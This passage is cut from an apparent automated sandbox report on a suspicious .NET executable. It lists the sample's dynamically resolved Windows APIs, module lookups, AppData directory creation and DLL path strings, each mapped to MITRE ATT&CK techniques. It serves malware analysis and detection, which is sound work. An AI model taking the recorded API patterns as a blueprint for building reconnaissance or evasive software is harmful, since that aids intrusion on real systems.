InitializeAcl (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetComputerName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoExEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetCalendarInfoEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EnumSystemLocalesEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EnumTimeFormatsEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter IIDFromString (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoCreateFreeThreadedMarshaler (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoGetObjectContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LoadLibrary (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ResetSecurity (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetSecurity (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter BlessIWbemServices (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter BlessIWbemServicesObject (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetPropertyHandle (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WritePropertyValue (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Clone (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter VerifyClientKey (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetQualifierSet (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Get (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Put (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Delete (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetNames (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter BeginEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Next (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EndEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetPropertyQualifierSet (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetObjectText (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SpawnDerivedClass (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SpawnInstance (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CompareTo (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetPropertyOrigin (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter InheritsFrom (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetMethod (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter PutMethod (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter DeleteMethod (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter BeginMethodEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter NextMethod (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EndMethodEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetMethodQualifierSet (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetMethodOrigin (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_Get (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_Put (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_Delete (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_GetNames (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_BeginEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_Next (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter QualifierSet_EndEnumeration (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetCurrentApartmentType (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetDemultiplexedStub (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateInstanceEnumWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateClassEnumWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ExecQueryWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ExecNotificationQueryWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter PutInstanceWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter PutClassWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CloneEnumWbemClassObject (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ConnectServerWmi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetErrorInfo (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter Initialize (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SysStringLen (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RtlZeroMemory (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoGetMarshalSizeMax (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoMarshalInterface (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CoUnmarshalInterface (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e002203206c@ADVAPI32.dll\"\n \"15001600c03ec36b@ADVAPI32.dll\"\n \"0e000f00703fc36b@ADVAPI32.dll\"\n \"0e000f00cc3fc36b@ADVAPI32.dll\"\n \"11001200b447c36b@ADVAPI32.dll\"\n \"110012004848c36b@ADVAPI32.dll\"\n \"120013008c48c36b@ADVAPI32.dll\"\n \"12001300e448c36b@ADVAPI32.dll\"\n \"14001500386ec36b@ADVAPI32.dll\"\n \"14001500506ec36b@ADVAPI32.dll\"\n \"14001500686ec36b@ADVAPI32.dll\"\n \"17001800806ec36b@ADVAPI32.dll\"\n \"0d000e00986ec36b@ADVAPI32.dll\"\n \"11001200a86ec36b@ADVAPI32.dll\"\n \"11001200bc6ec36b@ADVAPI32.dll\"\n \"0f001000fc6fc36b@ADVAPI32.dll\"\n \"140015003c70c36b@ADVAPI32.dll\"\n \"140015005470c36b@ADVAPI32.dll\"\n \"0c000d009c70c36b@ADVAPI32.dll\"\n \"0c000d00ac70c36b@ADVAPI32.dll\"\n \"0e000f00bc70c36b@ADVAPI32.dll\"\n \"0e000f00cc70c36b@ADVAPI32.dll\"\n \"0b000c00dc70c36b@ADVAPI32.dll\"\n \"180019001473c36b@RPCRT4.dll\"\n \"130014004073c36b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-155", "relevance": 1, "name": "Contains ability to set file attributes (Dotnet)", "description": "Observed Namespace \"System.IO.FileSystemInfo\" and MemberReference \"get_Attributes\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.IO.FileSystemInfo\" and MemberReference \"set_Attributes\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00006044-00000C60-52043694]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00006044-00000C28-53127889]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00006044-00000C28-53375092]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00006044-00000C28-54198849]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00006044-00000C28-54305074]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00006044-00000C28-55224263]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00006044-00000C28-55815842]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00006044-00000C28-55916675]\n Observed system executable 